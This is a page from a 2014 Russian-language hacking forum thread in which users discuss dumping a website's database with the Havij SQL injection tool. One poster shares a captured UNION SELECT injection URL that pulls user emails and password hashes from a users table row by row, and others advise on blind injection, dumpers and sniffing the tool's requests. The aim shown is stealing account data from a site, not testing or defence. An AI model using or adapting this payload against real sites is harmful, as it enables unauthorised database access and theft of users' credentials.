HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Вопрос по сливу бд
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 10.07.2014, 15:02
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
А зачем сливать havijом ? Или у тебя blind-inj?
 
Ответить с цитированием

  #12  
Старый 10.07.2014, 16:48
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от попугай  
А зачем сливать havijом ? Или у тебя blind-inj?
Цитата:
Сообщение от None  
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 1
Это явно не блинд!
 
Ответить с цитированием

  #13  
Старый 10.07.2014, 16:48
djkefir
Новичок
Регистрация: 17.12.2010
Сообщений: 28
Провел на форуме:
10028

Репутация: 0
По умолчанию
Цитата:
Сообщение от попугай  
А зачем сливать havijом ? Или у тебя blind-inj?
Хавиджем сливаю потому что никак по-другому не умею)

Сейчас ищу дампер какой-нибудь.

Отснифал у хавиджа запрос скуль:

Код:
http://www.url.com/page.php?id=999999.9(+union+all+select+(select+concat(0x27,0x7e,pcp_users.user_email,0x5e,pcp_users.user_phash,0x27,0x7e)+from+`PCP7_TEST`.pcp_users+limit+1358,1)
 
Ответить с цитированием

  #14  
Старый 10.07.2014, 16:50
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
limit+1358,1
Понятно, почему так долго.

попугай, да потому что по другому человек не умеет.
 
Ответить с цитированием

  #15  
Старый 10.07.2014, 22:23
erwap
Познающий
Регистрация: 20.09.2012
Сообщений: 53
Провел на форуме:
20084

Репутация: 0
По умолчанию
Цитата:
Сообщение от djkefir  
Хавиджем сливаю потому что никак по-другому не умею)
Сейчас ищу дампер какой-нибудь.
Отснифал у хавиджа запрос скуль:
Код:
http://www.url.com/page.php?id=999999.9(+union+all+select+(select+concat(0x27,0x7e,pcp_users.user_email,0x5e,pcp_users.user_phash,0x27,0x7e)+from+`PCP7_TEST`.pcp_users+limit+1358,1)
А как снифал? у него вроде нет такого функционала
 
Ответить с цитированием

  #16  
Старый 11.07.2014, 01:25
djkefir
Новичок
Регистрация: 17.12.2010
Сообщений: 28
Провел на форуме:
10028

Репутация: 0
По умолчанию
Цитата:
Сообщение от erwap  
А как снифал? у него вроде нет такого функционала
Хммм. HTTP Analyzer -_-
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.